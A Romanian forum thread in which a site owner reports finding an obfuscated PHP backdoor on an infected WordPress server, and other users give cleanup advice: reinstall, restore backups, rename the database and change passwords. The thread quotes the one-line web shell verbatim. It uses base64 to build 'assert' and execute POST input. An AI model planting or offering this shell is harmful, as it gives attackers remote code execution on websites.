Cod base64 pe server

Cod PHP:

---

<?php $c=base64_decode('YXNzZXI=').$_GET['n'].'t';@$c($_POST['fyt']);?>abcabcabc

---

Am gasit asta pe server, cine trebuei sa remedieze? Firma de hosting sau ?

Nu cred ca e treaba firmei de hosting... Un cod base64 nu trebuie neaparat "remediat". Cred ca trebuie vazut ce e cu el, unde e si ce face, deci ai nevoie de un programator caruia sa ii dai full acces la fisierele tale pentru a putea urmari codul.

Azi a avut loc "aracul", un intreg server e infestat, de cand am scris mesajul deja lurceaza, modifica fisierele index.php ... tema e cumparat, wordpress curat... na .. ce sa zic?

In cazul asta pot rezolva cei de la hosting cu un backup total rapid.

Citat:

---

Postat în original de Mishu

In cazul asta pot rezolva cei de la hosting cu un backup total rapid.

---

Daca ar raspunde :( alta metoda nu ar fi? Adica daca ma apuc sa reinstalez eu? Ma gandesc ca daca e atacata si baza de date... slabe sanse )

Am aflat si de unde e buba: hacked by megla akash from Team_CC

Interesant este ca au facut si sitemap .. atacul pare a fi incepand cu ora 1:10 cu modificarea robots.txt Sitemap: http://site.info/sitemap.xml ...

Intrebare: daca sterg doar wordpress.-ul si pastrez baza de dare care ar fi sansele sa scap?

Poti incerca reinstalare wp, tema, module, etc. Dar cum ai zis si tu... iti ia o gramada de timp.
Daca a putut intra inseamna ca undeva ai avut o vulnerabilitate (instalare wp, tema, module). Daca e afectata si baza de date poti rezolva daca ai un backup dar e recomandat sa schimbi atat numemele bazei de date precum si prefixele tabelelor si toate parolele.

Citat:

---

Postat în original de Mishu

Daca e afectata si baza de date poti rezolva daca ai un backup dar e recomandat sa schimbi atat numemele bazei de date precum si prefixele tabelelor si toate parolele.

---

Pai daca le schimb rezolv? Ca ma tem ca in baza de date sa nu fie injectat ceva care sa afecteze de fapt... acum ca dureaza asta este, alta varianta nu prea vad...! Ma apuc de reinstalat am doar 12 site-uri! :(

Citat:

---

Postat în original de Rapsodia

Intrebare: daca sterg doar wordpress.-ul si pastrez baza de dare care ar fi sansele sa scap?

---

Cred ca peste 80%

Citat:

---

Postat în original de Rapsodia

Pai daca le schimb rezolv? Ca ma tem ca in baza de date sa nu fie injectat ceva care sa afecteze de fapt... acum ca dureaza asta este, alta varianta nu prea vad...! Ma apuc de reinstalat am doar 12 site-uri! :(

---

Suna-i pe cei de la gazduire, da cumva de ei.... Modificarile de care ti-am zis au doar rolul de a-l impiedica sa intre din nou accesand aceeasi vulnerabilitate. Daca a injectat ceva in db cureti de-ti vine rau....